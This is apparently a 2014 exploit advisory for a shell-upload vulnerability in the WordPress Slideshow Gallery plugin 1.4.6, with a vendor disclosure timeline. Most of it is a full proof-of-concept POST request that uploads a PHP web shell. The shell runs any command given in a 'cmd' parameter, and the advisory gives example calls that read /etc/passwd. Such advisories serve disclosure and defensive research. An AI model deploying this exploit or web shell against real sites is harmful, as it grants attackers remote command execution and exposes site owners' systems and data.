Wordpress Slideshow Gallery

######################
# Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://tribulant.com

# Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip

# Date : 2014-08-09

# Tested on : Windows 7 / Mozilla Firefox

######################

# Description :  

Any user could upload php files (administrator by default).

######################

# Location

http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php

######################

# PoC Exploit:

POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wp-admin/admin.php?page=slideshow-slides&method=save&id=4
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7C538bd40b62d672bbc26a5b5d8a0cf9e5; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407776360%7Cac34ce538e8b9532559c6940a5d73c04; redux_current_tab=3
Connection=keep-alive
Content-Type=multipart/form-data; boundary=---------------------------31064175401770
Content-Length=1839
POSTDATA =-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[id]"

4
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[order]"

0
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[title]"

titolo_demo
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[description]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[showinfo]"

both
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[iopacity]"

70
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[type]"

file
-----------------------------31064175401770
Content-Disposition: form-data; name="image_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/shell.php?cmd=cat+/etc/passwd


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_oldfile]"

2136.png
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[image_url]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[uselink]"

N
-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[link]"


-----------------------------31064175401770
Content-Disposition: form-data; name="Slide[linktarget]"

self
-----------------------------31064175401770
Content-Disposition: form-data; name="submit"

Save Slide
-----------------------------31064175401770--


Backdoor location:

http://127.0.0.1/wp-content/uploads/slideshow-gallery/shell.php?cmd=pwd


PoC Video:

https://www.youtube.com/watch?v=9iuMsUFl9dM

######################

# Vulnerability Disclosure Timeline:

2014-08-09:  Discovered vulnerability (1.4.5 version)
2014-08-09:  Vendor Notification (Twitter)
2014-08-14:  Plugin version 1.4.6 released without fix
2014-08-14:  Vendor Notification (Support web page)
2014-08-15:  Vendor Response/Feedback 
2014-08-29:  Vendor Fix/Patch (1.4.7)
2014-09-01:  Public Disclosure

#####################

Discovered By : Claudio Viviani
            http://www.homelab.it
            [email protected]
            [email protected]

            https://www.facebook.com/homelabit
            https://twitter.com/homelabit
            https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################